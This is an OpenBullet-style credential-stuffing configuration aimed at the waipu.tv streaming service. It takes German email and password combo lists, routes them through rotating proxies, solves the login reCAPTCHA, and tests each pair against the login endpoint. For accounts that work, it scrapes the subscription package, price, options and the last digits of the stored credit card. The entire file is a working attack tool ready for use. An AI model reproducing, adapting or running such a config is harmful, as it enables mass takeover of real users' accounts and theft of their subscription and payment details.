[SETTINGS]
{
  "Name": "Waipu Api",
  "SuggestedBots": 20,
  "MaxCPM": 0,
  "LastModified": "2022-02-20T20:48:18.4849573+04:00",
  "AdditionalInfo": ".DE Combos | Use Rotating Proxy",
  "RequiredPlugins": [],
  "Author": "",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION ClearCookies 

SOLVECAPTCHA ReCaptchaV2 "6Ld2rQgUAAAAAIPMVx1YmYZY_uw3s1KQbjwoD8As" "https://auth.waipu.tv" 

REQUEST POST "https://auth.waipu.tv/ui/login" 
  CONTENT "emailAddress=<USER>&password=<PASS>&recaptcha_action=AUTH_%2Fui%2Flogin&recaptcha_response=<SOLUTION>&successUrl=https%253A%252F%252Fplay.waipu.tv%252F&state=6e25728984ce0e7e5876cbf75e5c35eaa2e0d2824ca79179deaa403612c697f285766f7a6a3fb3b2&responseType=&userAgent=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER ": scheme: https" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "cache-control: max-age=0" 
  HEADER "content-length: 1264" 
  HEADER "content-type: application/x-www-form-urlencoded" 
  HEADER "origin: https://auth.waipu.tv" 
  HEADER "referer: https://auth.waipu.tv/ui/login" 
  HEADER "sec-ch-ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"98\", \"Google Chrome\";v=\"98\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "sec-fetch-dest: document" 
  HEADER "sec-fetch-mode: navigate" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-fetch-user: ?1" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Die Zugangsdaten sind ungültig." 
    KEY "The access data are invalid." 
  KEYCHAIN Success OR 
    KEY "<COOKIES(user_token)>" Contains "eyJ" 
    KEY "Mein Packet" 
  KEYCHAIN Retry OR 
    KEY "Internal Server Error" 

REQUEST GET "https://customer-self-care.waipu.tv/ui/my_subscription" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<h1 class=\"package-teaser__name\">" "</h1>" Recursive=TRUE -> CAP "Package" 

PARSE "<SOURCE>" LR "<span class=\"labeled__package-runtime\">" "</span>" Recursive=TRUE -> CAP "Package Active" 

PARSE "<SOURCE>" LR "<a href=\"/ui/my_invoices\" class=\"text-link\">" "</a>" Recursive=TRUE -> CAP "Price" 

PARSE "<SOURCE>" LR "<div class=\"usage-info__row\">" "</div>" Recursive=TRUE CreateEmpty=FALSE -> CAP "Recording memory" 

PARSE "<SOURCE>" LR "<div class=\"option-list__description\">" " </div>" Recursive=TRUE CreateEmpty=FALSE -> CAP "Mobile option" 

REQUEST GET "https://customer-self-care.waipu.tv/ui/account" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<dd class=\"labeled__value\">**** **** **** " "</dd>" Recursive=TRUE -> CAP "Credit Card" "C-" "" 

